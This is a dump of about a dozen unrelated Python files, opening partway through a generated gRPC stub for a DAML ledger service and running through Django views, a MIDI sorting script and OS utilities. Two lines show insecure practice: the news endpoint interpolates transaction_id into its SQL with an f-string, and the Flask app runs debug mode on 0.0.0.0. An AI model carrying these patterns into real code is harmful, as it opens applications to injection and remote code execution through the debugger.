For looking up a transaction instead of a transaction tree, please see GetFlatTransactionById
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetFlatTransactionByEventId(self, request, context):
"""Lookup a transaction by the ID of an event that appears within it.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetFlatTransactionById(self, request, context):
"""Lookup a transaction by its ID.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetLedgerEnd(self, request, context):
"""Get the current ledger end.
Subscriptions started with the returned offset will serve transactions created after this RPC was called.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetLatestPrunedOffsets(self, request, context):
"""Get the latest successfully pruned ledger offsets
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_TransactionServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetTransactions': grpc.unary_stream_rpc_method_handler(
servicer.GetTransactions,
request_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionsRequest.FromString,
response_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionsResponse.SerializeToString,
),
'GetTransactionTrees': grpc.unary_stream_rpc_method_handler(
servicer.GetTransactionTrees,
request_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionsRequest.FromString,
response_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionTreesResponse.SerializeToString,
),
'GetTransactionByEventId': grpc.unary_unary_rpc_method_handler(
servicer.GetTransactionByEventId,
request_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionByEventIdRequest.FromString,
response_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionResponse.SerializeToString,
),
'GetTransactionById': grpc.unary_unary_rpc_method_handler(
servicer.GetTransactionById,
request_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionByIdRequest.FromString,
response_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionResponse.SerializeToString,
),
'GetFlatTransactionByEventId': grpc.unary_unary_rpc_method_handler(
servicer.GetFlatTransactionByEventId,
request_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionByEventIdRequest.FromString,
response_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetFlatTransactionResponse.SerializeToString,
),
'GetFlatTransactionById': grpc.unary_unary_rpc_method_handler(
servicer.GetFlatTransactionById,
request_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionByIdRequest.FromString,
response_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetFlatTransactionResponse.SerializeToString,
),
'GetLedgerEnd': grpc.unary_unary_rpc_method_handler(
servicer.GetLedgerEnd,
request_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetLedgerEndRequest.FromString,
response_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetLedgerEndResponse.SerializeToString,
),
'GetLatestPrunedOffsets': grpc.unary_unary_rpc_method_handler(
servicer.GetLatestPrunedOffsets,
request_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetLatestPrunedOffsetsRequest.FromString,
response_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetLatestPrunedOffsetsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'com.daml.ledger.api.v1.TransactionService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class TransactionService(object):
"""Allows clients to read transactions from the ledger.
"""
@staticmethod
def GetTransactions(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_stream(request, target, '/com.daml.ledger.api.v1.TransactionService/GetTransactions',
com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionsRequest.SerializeToString,
com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetTransactionTrees(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_stream(request, target, '/com.daml.ledger.api.v1.TransactionService/GetTransactionTrees',
com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionsRequest.SerializeToString,
com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionTreesResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetTransactionByEventId(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/com.daml.ledger.api.v1.TransactionService/GetTransactionByEventId',
com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionByEventIdRequest.SerializeToString,
com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetTransactionById(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/com.daml.ledger.api.v1.TransactionService/GetTransactionById',
com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionByIdRequest.SerializeToString,
com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetFlatTransactionByEventId(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/com.daml.ledger.api.v1.TransactionService/GetFlatTransactionByEventId',
com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionByEventIdRequest.SerializeToString,
com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetFlatTransactionResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetFlatTransactionById(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/com.daml.ledger.api.v1.TransactionService/GetFlatTransactionById',
com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionByIdRequest.SerializeToString,
com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetFlatTransactionResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetLedgerEnd(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/com.daml.ledger.api.v1.TransactionService/GetLedgerEnd',
com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetLedgerEndRequest.SerializeToString,
com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetLedgerEndResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetLatestPrunedOffsets(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/com.daml.ledger.api.v1.TransactionService/GetLatestPrunedOffsets',
com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetLatestPrunedOffsetsRequest.SerializeToString,
com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetLatestPrunedOffsetsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
|
import random
from midiutil import MIDIFile
def duration():
duration=random.uniform(5.0,30.0)
return duration
def pause():
pause=random.randrange(20,100,10)
pause2=pause/100.0
return pause2
def volume():
volume=random.randrange(60,100,1)
return volume
def insertionSort(notes,time):
for i, pitch in enumerate(notes):
MyMIDI.addNote(track, channel, pitch, time, duration(), volume())
time=time+pause()
for index in range(1,len(notes)):
currentvalue = notes[index]
position = index
while position>0 and notes[position-1]>currentvalue:
notes[position]=notes[position-1]
position = position-1
notes[position]=currentvalue
for i, pitch in enumerate(notes):
MyMIDI.addNote(track, channel, pitch, time, duration(), volume())
time=time+pause()
def selectionSort(notes, time):
for i, pitch in enumerate(notes):
MyMIDI.addNote(track, channel, pitch, time, duration(), volume())
time=time+pause()
for fillslot in range(len(notes)-1,0,-1):
positionOfMax=0
for location in range(1,fillslot+1):
if notes[location]>notes[positionOfMax]:
positionOfMax = location
temp = notes[fillslot]
notes[fillslot] = notes[positionOfMax]
notes[positionOfMax] = temp
for i, pitch in enumerate(notes):
MyMIDI.addNote(track, channel, pitch, time, duration(), volume())
time=time+pause()
def bubbleSort(notes,time):
for i, pitch in enumerate(notes):
MyMIDI.addNote(track, channel, pitch, time, duration(), volume())
time=time+pause()
for passnum in range(len(notes)-1,0,-1):
for i in range(passnum):
if notes[i]>notes[i+1]:
temp = notes[i]
notes[i] = notes[i+1]
notes[i+1] = temp
scales=[[2,2,1,2,2,2,1], #00-Major
[2,1,2,2,1,2,2], #01-Natural Minor
[2,1,2,2,2,2,1], #02-Melodic Minor
[2,1,2,2,1,3,1], #03-Harmonic Minor
[3,2,1,1,3,2], #04-Minor Pentatonic
[2,1,1,3,2,3], #05-Major Blues
[2,2,1,2,1,1,2,1], #06-Major Bebop
[2,1,1,1,2,2,1,2], #07-Minor Bebop
[1,2,1,2,2,2,2], #08-Super Locrian
[2,1,1,2,1,1,1,2,1], #09-Nine Tone
[2,1,2,2,2,1,2], #10-Dorian
[1,2,2,2,1,2,2], #11-Phrygian
[2,2,2,1,2,2,1], #12-Lydian
[2,2,1,2,2,1,2], #13-Mixolydian
[2,1,2,2,1,2,2], #14-Aeolian
[1,2,2,1,2,2,2], #15-Locrian
[3,2,2,3,2], #16-Pentatonic Minor
[2,2,3,2,3], #17-Pentatonic Major
[2,1,2,1,1,1,3,1], #18-Algerian
[2,2,1,1,2,2,2], #19-Arabic
[3,1,3,1,3,1], #20-Augmented
[1,2,4,1,4], #21-Balinese
[1,3,1,2,1,3,1], #22-Byzantine
[4,2,1,4,1], #23-Chinese
[2,1,2,1,2,1,2,1], #24-Diminished
[1,2,1,2,1,2,1,2], #25-Dominant Diminished
[2,3,2,3,2], #26-Egyptian
[1,2,1,1,1,2,2,2], #27-Eight Tone Spanish
[1,3,2,2,2,1,1], #28-Enigmatic Major
[1,2,3,1,3,1,1], #29-Enigmatic Minor
[2,1,2,2,1,2,2], #30-Geez
[2,2,1,2,1,2,2], #31-Aeolian Dominant
[1,4,1,4,2], #32-Hirajoshi
[2,1,3,1,1,3,1], #33-Hungarian Minor (Gypsy)
[3,1,2,1,2,1,2], #34-Hungarian Major
[1,4,2,3,2], #35-Japanese
[2,2,2,1,2,1,2], #36-Lydian Dominant
[1,2,2,2,1,3,1], #37-Neapolitan Minor
[1,2,2,2,2,2,1], #38-Neapolitan Major
[1,2,1,2,1,2,1,2], #39-Octatonic (Half Whole)
[2,1,2,1,2,1,2,1], #40-Octatonic (Whole Half)
[1,3,1,1,3,1,2], #41-Oriental
[2,2,2,2,2,2], #42-Whole Tone
[2,1,3,1,2,1,2], #43-Romanian Minor
[1,3,1,2,1,2,2], #44-Spanish Gypsy (Phrygian Dominant)
[2,3,2,2,3]] #45-Yo
track = 0
channel = 0
time = 0
tempo = 120
MyMIDI = MIDIFile(1)
MyMIDI.addTempo(track, time, tempo)
note_set=[39,41,44,46,48,51,53,56,58,63]
notes=[]
for i in range(0,50):
notes.append(random.choice(note_set))
#insertionSort(notes,time)
selectionSort(notes, time)
#bubbleSort(notes,time)
with open("NoteSort.mid", "wb") as output_file:
MyMIDI.writeFile(output_file)
|
from ..FeatureExtractor import ContextFeatureExtractor
import ned
class distance_in_kpc_to_nearest_galaxy(ContextFeatureExtractor):
"""distance_in_kpc_to_nearest_galaxy"""
active = True
extname = 'distance_in_kpc_to_nearest_galaxy' #extractor's name
cutoff = 1000.0 ## kpc
verbose = False
def extract(self):
n = self.fetch_extr('tmpned')
#if not isinstance(n,ned.NED):
# self.ex_error("bad ned instance")
try:
tmp = n.distance_in_kpc_to_nearest_galaxy()
except:
return None # 20081010 dstarr adds try/except in case NED mysql cache server is down
if tmp['distance'] is None or tmp['distance'] > self.cutoff:
## JSB change to None because we assume we dont have a result here
rez = None
else:
rez = tmp['distance']
if self.verbose:
print tmp
return rez
|
from django.contrib.auth import login, authenticate
from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import UserCreationForm
from django.shortcuts import get_object_or_404, render, redirect
from django.http import HttpResponse
from .models import Beer, BeerStyle, Brewery, Hops, Review
def index(request):
beers = Beer.objects.order_by('name')
breweries = Brewery.objects.order_by('name')
hops = Hops.objects.order_by('name')
styles = BeerStyle.objects.order_by('name')
context = {
'beer_list': beers,
'brewery_list': breweries,
'hops_list': hops,
'styles_list': styles,
}
return render(request, 'beers/index.html', context)
def beer_detail(request, beer_id):
beer = get_object_or_404(Beer, pk=beer_id)
return render(request, 'beers/beer_detail.html',
{
'beer': beer,
'ratings': beer.rating_data(),
'user_rating': beer.user_rating_data(request.user),
'predictions': beer.prediction_data(request.user),
}
)
def hops_detail(request, hops_id):
hops = get_object_or_404(Hops, pk=hops_id)
return render(request, 'beers/hops_detail.html',
{
'hops': hops,
'ratings': hops.rating_data(),
'user_rating': hops.user_rating_data(request.user)
}
)
def brewery_detail(request, brewery_id):
brewery = get_object_or_404(Brewery, pk=brewery_id)
return render(request, 'beers/brewery_detail.html',
{
'brewery': brewery,
'ratings': brewery.rating_data(),
'user_rating': brewery.user_rating_data(request.user)
}
)
def style_detail(request, style_id):
style = get_object_or_404(BeerStyle, pk=style_id)
return render(request, 'beers/style_detail.html',
{
'style': style,
'ratings': style.rating_data(),
'user_rating': style.user_rating_data(request.user)
}
)
@login_required
def review_create(request):
if request.method == 'GET':
max_rating = 5
return render(request, 'beers/review_create.html', {
'rating_range': range(1, max_rating + 1),
'beers': Beer.objects.all(),
})
beer = get_object_or_404(Beer, pk=request.POST['beer'])
try:
rating_val = request.POST['rating']
except (KeyError):
return render(request, 'beers/review_create.html', {
'error_message': 'you must select a rating!',
})
else:
review = Review(beer=beer, user=request.user, rating=rating_val)
review.save()
return redirect('beer_detail', beer.id)
def signup(request):
if request.user.is_authenticated:
return redirect("/")
if request.method == "POST":
form = UserCreationForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
raw_password = form.cleaned_data.get('password1')
user = authenticate(username=username, password=raw_password)
login(request, user)
return redirect("/")
else:
form = UserCreationForm()
return render(request, "registration/signup.html", {"form": form})
|
# Generated by Django 3.2.3 on 2021-06-12 03:51
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('pizza_app', '0006_auto_20210612_0334'),
]
operations = [
migrations.RemoveField(
model_name='ingredientsize',
name='type_size',
),
]
|
import socket
import sys
from time import sleep
from flask import Flask
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ('dgonyeoraspi.csh.rit.edu', 10001)
app = Flask(__name__)
@app.route('/')
def hello_world():
return 'Hello World!'
if __name__ == '__main__':
print('connecting')
sock.connect(server_address)
print('connected')
app.run(host='0.0.0.0', debug=True)
|
from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def index(request):
convolutions = range(1)
return render(request,
'convolution/index.html',
{'convolutions':convolutions})
def add(request):
return HttpResponse("add") |
from collections import namedtuple
import pandas as pd
from promise import Promise
from promise.dataloader import DataLoader
from graphql import GraphQLError
from app import db
from app.util import (
_SemesterContent,
ProposalInactiveReason,
ProposalStatus,
ProposalType,
)
ProposalContent = namedtuple(
"ProposalContent",
[
"proposal_code",
"title",
"proposal_type",
"status",
"status_comment",
"inactive_reason",
"completion_comments",
"principal_investigator",
"principal_contact",
"liaison_astronomer",
"blocks",
"observations",
"time_allocations",
"requested_times"
],
)
TimeAllocationContent = namedtuple(
"TimeAllocation", ["priority", "semester", "partner_code", "amount"]
)
RequestedTimeContent = namedtuple(
"RequestedTime", ["minimum_useful_time", "semester", "partner_time"]
)
TimeRequestContent = namedtuple(
"TimeRequest", ["partner_code", "time"]
)
CompletionCommentContent = namedtuple(
"CompletionCommentContent", ["semester", "comment"]
)
class ProposalLoader(DataLoader):
def __init__(self):
DataLoader.__init__(self, cache=False)
def batch_load_fn(self, proposal_codes):
return Promise.resolve(self.get_proposals(proposal_codes))
def get_proposals(self, proposal_codes):
# general proposal info
sql = """
SELECT Proposal_Code, Title, ProposalType, Status, StatusComment, InactiveReason,
Leader_Id, Contact_Id, Astronomer_Id
FROM Proposal AS p
JOIN ProposalCode AS pc ON p.ProposalCode_Id = pc.ProposalCode_Id
JOIN ProposalText AS pt ON p.ProposalCode_Id = pt.ProposalCode_Id
JOIN ProposalGeneralInfo AS pgi ON p.ProposalCode_Id = pgi.ProposalCode_Id
JOIN ProposalStatus AS ps ON pgi.ProposalStatus_Id = ps.ProposalStatus_Id
JOIN ProposalType AS type ON pgi.ProposalType_Id = type.ProposalType_Id
JOIN P1ObservingConditions AS p1o ON p1o.ProposalCode_Id = p.ProposalCode_Id
LEFT JOIN ProposalInactiveReason AS pir
ON pgi.ProposalInactiveReason_Id = pir.ProposalInactiveReason_Id
JOIN ProposalContact contact ON pc.ProposalCode_Id = contact.ProposalCode_Id
WHERE Current=1 AND Proposal_Code IN %(proposal_codes)s
"""
df_general_info = pd.read_sql(
sql, con=db.engine, params=dict(proposal_codes=proposal_codes)
)
values = dict()
for _, row in df_general_info.iterrows():
inactive_reason = (
ProposalInactiveReason.get(row["InactiveReason"])
if row["InactiveReason"]
else None
)
liaison_astronomer = (
row["Astronomer_Id"] if pd.notnull(row["Astronomer_Id"]) else None
)
values[row["Proposal_Code"]] = dict(
proposal_code=row["Proposal_Code"],
title=row["Title"],
time_allocations=set(),
requested_times=set(),
proposal_type=ProposalType.get(row["ProposalType"]),
status=ProposalStatus.get(row["Status"]),
status_comment=row["StatusComment"],
inactive_reason=inactive_reason,
completion_comments=set(),
principal_investigator=row["Leader_Id"],
principal_contact=row["Contact_Id"],
liaison_astronomer=liaison_astronomer,
blocks=set(),
observations=set(),
)
# completion comments
sql = """
SELECT Proposal_Code, CompletionComment, Year, Semester
FROM ProposalText AS pt
JOIN ProposalCode AS pc on pt.ProposalCode_Id = pc.ProposalCode_Id
JOIN Semester AS s ON pt.Semester_Id=s.Semester_Id
WHERE Proposal_Code IN %(proposal_codes)s
"""
df_completion_comments = pd.read_sql(
sql, con=db.engine, params=dict(proposal_codes=proposal_codes)
)
for _, row in df_completion_comments.iterrows():
semester = _SemesterContent(year=row["Year"], semester=row["Semester"])
comment = CompletionCommentContent(
semester=semester, comment=row["CompletionComment"]
)
values[row["Proposal_Code"]]["completion_comments"].add(comment)
# blocks
sql = """
SELECT Proposal_Code, Block_Id
FROM Block AS b
JOIN ProposalCode AS pc ON b.ProposalCode_Id = pc.ProposalCode_Id
JOIN BlockStatus AS bs ON b.BlockStatus_Id = bs.BlockStatus_Id
WHERE Proposal_Code IN %(proposal_codes)s
AND BlockStatus IN ('Active', 'Completed', 'On Hold')
"""
df_blocks = pd.read_sql(
sql, con=db.engine, params=dict(proposal_codes=proposal_codes)
)
for _, row in df_blocks.iterrows():
values[row["Proposal_Code"]]["blocks"].add(row["Block_Id"])
# observations (i.e. block visits)
sql = """
SELECT Proposal_Code, BlockVisit_Id
FROM BlockVisit AS bv
JOIN Block AS b ON bv.Block_Id = b.Block_Id
JOIN ProposalCode AS pc ON b.ProposalCode_Id = pc.ProposalCode_Id
WHERE Proposal_Code IN %(proposal_codes)s
"""
df_block_visits = pd.read_sql(
sql, con=db.engine, params=dict(proposal_codes=proposal_codes)
)
for _, row in df_block_visits.iterrows():
values[row["Proposal_Code"]]["observations"].add(row["BlockVisit_Id"])
# time allocations
sql = """
SELECT Proposal_Code, Priority, Year, Semester, Partner_Code, TimeAlloc
FROM PriorityAlloc AS pa
JOIN MultiPartner AS mp ON pa.MultiPartner_Id = mp.MultiPartner_Id
JOIN Partner AS p ON mp.Partner_Id = p.Partner_Id
JOIN Semester AS s ON mp.Semester_Id = s.Semester_Id
JOIN ProposalCode AS pc ON mp.ProposalCode_Id = pc.ProposalCode_Id
WHERE Proposal_Code IN %(proposal_codes)s AND TimeAlloc>0
"""
df_time_alloc = pd.read_sql(
sql, con=db.engine, params=dict(proposal_codes=proposal_codes)
)
for _, row in df_time_alloc.iterrows():
semester = _SemesterContent(year=row["Year"], semester=row["Semester"])
values[row["Proposal_Code"]]["time_allocations"].add(
TimeAllocationContent(
priority=row["Priority"],
semester=semester,
partner_code=row["Partner_Code"],
amount=row["TimeAlloc"],
)
)
def proposal_content(proposal_code):
proposal = values.get(proposal_code)
if not proposal:
raise GraphQLError(
"There exists no proposal with proposal code {code}".format(
code=proposal_code
)
)
return ProposalContent(**proposal)
# collect results
proposals = [
proposal_content(proposal_code) for proposal_code in proposal_codes
]
return Promise.resolve(proposals)
|
import stage
import ugame
PALETTE = (b'\xf0\x0f\x00\x00\xcey\xff\xff\xf0\x0f\x00\x19\xfc\xe0\xfd\xe0'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
game = stage.Stage(ugame.display, 12)
text = stage.Text(16, 16, palette=PALETTE)
game.layers = [text]
i = 0
for y in range(16):
for x in range(16):
text.char(x, y, chr(i))
print(chr(i))
i += 1
game.render_block() |
#!/usr/bin/env python
"""
pyjld.os.tools
Various OS utilities
@author: Jean-Lou Dupont
"""
__author__ = "Jean-Lou Dupont"
__email = "python (at) jldupont.com"
__fileid = "$Id$"
__all__ = ['safe_mkdir','psyspaths','safe_oneup','safe_walkup', 'versa_copy',
'copyFiles', 'copyUpdatedFiles', 'genUpdatedFiles',
'safe_copytree', 'recursive_chmod'
]
import os
import shutil
import sys
from types import *
class pyjld_os_Error(EnvironmentError):
pass
def safe_mkdir(path, mode=0777):
"""
Safely creates a directory hierarchy
This function does not throw an exception if the path already exists or
is created successfully; this behavior contrasts with that of the
standard ``os.makedirs`` builtin i.e. throws an error if the path
already exists.
The function only fails if the child directory and its required parent
hierarchy can not be created.
The function accepts either a string or a list for the parameter ``path``.
If ``path`` is a list, the function performs an ``os.path.join`` to construct
the target path.
.. Parameters
**Returns**: (existed, path)
The function returns a boolean True if the directory already existed.
"""
# expand list if necessary
if type(path) is ListType:
path = os.path.join(*path)
try: already_exists = os.path.isdir(path)
except: already_exists = False
if already_exists:
return True, path
try: os.makedirs( path, mode )
except: pass
exists = os.path.exists(path)
if not exists:
raise RuntimeError("path[%path] can not be created. Is it a valid directory path?")
# we obviously had to create it.
return False, path
def versa_copy(src_file, target_path):
"""
Copies the ``src_file`` to the ``target_path``
The parameter ``src_file`` can be either a list consisting of
`path fragments` or a just a string representing the filesystem path.
**Returns**: ``(src_file, dest_file)``.
"""
if type(src_file) is ListType:
src_file = os.path.join(*src_file)
base_name = os.path.basename( src_file )
dest_file = os.path.join(target_path, base_name)
shutil.copyfile(src_file, dest_file)
return (src_file, dest_file)
def copyFiles(src_path, dest_path):
"""
Copies all the files (non-recursive) from ``src_path``
to ``dest_path``
The function returns the tuple list of
files copied i.e. ``(src_file, dest_file)``.
**Returns**: list of files copied in the form ::
[ (src_file, dest_file) ...]
"""
files=[]
src_files = os.listdir(src_path)
for src_file_name in src_files:
src_file = os.path.join( src_path, src_file_name )
dest_file = os.path.join( dest_path, src_file_name )
shutil.copyfile( src_file, dest_file )
files.append( (src_file, dest_file) )
return files
def genUpdatedFiles(src_path, dest_path):
"""
Generator which provides updated files by comparing
the files in ``src_path`` to the files contained
in ``dest_path``.
**Returns**: each iteration provides a tuple of the form ::
(src_file, dest_file)
"""
src_files = os.listdir(src_path)
dest_files = os.listdir(dest_path)
for src_file_name in src_files:
src_file = os.path.join( src_path, src_file_name )
src_stat = os.stat( src_file )
src_mtime = src_stat.st_mtime
dest_file = os.path.join( dest_path, src_file_name )
try:
dest_stat = os.stat( dest_file )
dest_mtime = dest_stat.st_mtime
except:
dest_mtime = 0L
if src_mtime > dest_mtime:
yield (src_file, dest_file)
raise StopIteration
def copyUpdatedFiles(src_path, dest_path):
"""
Copies only the updated files from ``src_path``
to the destination directory ``dest_path``
**Returns**: list of files copied in the form ::
[ (src_file, dest_file) ...]
"""
files=[]
for src_file, dest_file in genUpdatedFiles(src_path, dest_path):
shutil.copy(src_file, dest_file)
files.append( (src_file, dest_file) )
return files
def psyspaths():
"""
Pretty print sys.path
Usage ::
>>> from pyjld.os import psyspaths
>>> psyspaths()
"""
import pprint
pp = pprint.PrettyPrinter()
pp.pprint( sys.path )
def safe_oneup(path):
"""
Goes up one level in the directory hierarchy starting from ``path``
**Returns**: `None` when error/reached the top
"""
try:
one_up = os.path.dirname( path )
#Have we reached the top?
if one_up == path:
return None
except:
return None
return one_up
def safe_walkup(path):
"""
Safely walks up the directory hierarchy
This function is implemented as a generator.
Usage ::
>>> cd = os.getcwd()
>>> for path in safe_walkup(cd):
... print path
"""
path = safe_oneup(path)
while(path is not None):
yield path
path = safe_oneup(path)
raise StopIteration
## Quick and dirty because
## __builtins__ differs slightly between Python2.5 and Python2.6
try:
WindowsError()
except:
class WindowsError(Exception):
pass
def safe_copytree(src, dst, symlinks=False, dir_mode=0777, skip_dirs=[], make_dirs=False):
"""
Recursively copy a directory tree using copy2(). This function
is meant to complement the less versatile ``shutil.copytree``.
The destination directory may not already exist: missing directory
paths are created on the fly with the ``dir_mode`` as mode.
Directories can be skipped entirely using ``skip_dirs`` list ::
['.svn', '.doctree',]
If exception(s) occur, an ``pyjld_os_Error`` is raised
with a list of reasons.
If the optional symlinks flag is true, symbolic links in the
source tree result in symbolic links in the destination tree; if
it is false, the contents of the files pointed to by symbolic
links are copied.
"""
names = os.listdir(src)
if make_dirs:
os.makedirs(dst)
errors = []
for name in names:
srcname = os.path.join(src, name)
dstname = os.path.join(dst, name)
try:
if symlinks and os.path.islink(srcname):
linkto = os.readlink(srcname)
os.symlink(linkto, dstname)
elif os.path.isdir(srcname):
#JLD: skip dir?
base_srcname = os.path.basename(srcname)
if not base_srcname in skip_dirs:
safe_copytree(srcname, dstname,
symlinks=symlinks,
dir_mode=dir_mode,
skip_dirs=skip_dirs,
make_dirs=make_dirs)
else:
#JLD: make sure target directory exists
safe_mkdir(dst, dir_mode)
shutil.copy2(srcname, dstname)
# XXX What about devices, sockets etc.?
except (IOError, os.error), why:
errors.append((srcname, dstname, str(why)))
# catch the Error from the recursive copytree so that we can
# continue with other files
except pyjld_os_Error, err:
errors.extend(err.args[0])
try:
shutil.copystat(src, dst)
except WindowsError:
# can't copy file access times on Windows
pass
except OSError, why:
errors.extend((src, dst, str(why)))
if errors:
raise pyjld_os_Error, errors
def recursive_chmod(path,
mode=0775,
do_files=True,
do_dirs=True,
skip_files=[],
skip_dirs=[] ):
"""
Recursive ``chmod``
:param path: the top level starting path
:param mode: the mode to apply
:param do_files: to perform the operation on files
:param do_dirs: to perform the operation on dirs
:param skip_files: to skip files, list the basenames
:param skip_dirs: to skip dirs, list the basenames
"""
paths=[]
for root, dirs, files in os.walk(path):
if do_files:
for filename in files:
this_path = os.path.join(root, filename)
base_name = os.path.basename( this_path )
if base_name not in skip_files:
os.chmod(this_path, mode)
paths.append(this_path)
if do_dirs:
for _dir in dirs:
this_path = os.path.join(root, _dir)
base_name=os.path.basename(this_path)
if base_name not in skip_dirs:
os.chmod(this_path, mode)
paths.append(this_path)
return paths
# ==============================================
# ==============================================
if __name__ == "__main__":
""" Tests
"""
import doctest
doctest.testmod(optionflags=doctest.ELLIPSIS)
|
from carbon_black.endpoints.base_endpoint import Endpoint
from shared.models import News_Event
from datetime import datetime
class News(Endpoint):
def __init__(self) -> None:
super().__init__()
return
def get(self, api_endpoint: str, transaction_id: int) -> dict:
try:
results = super().query(api_endpoint,
f"SELECT * FROM News_Event WHERE transaction_id = {transaction_id};")
return self.make_news_model(results)
except Exception as err:
return {
'error': {
'news': str(repr(err))
}
}
def make_news_model(self, sql_results: list):
all_results = []
for item in sql_results:
model = News_Event()
model.data['news_event_id'] = item[0]
model.data['transaction_id'] = item[1]
model.data['date_of_article'] = item[2].strftime('%Y-%m-%d')
model.data['title_of_article'] = item[3]
model.data['link'] = item[4]
model.data['source'] = item[5]
all_results.append(model.data)
return all_results
|
from spack import *
import platform
import sys,os
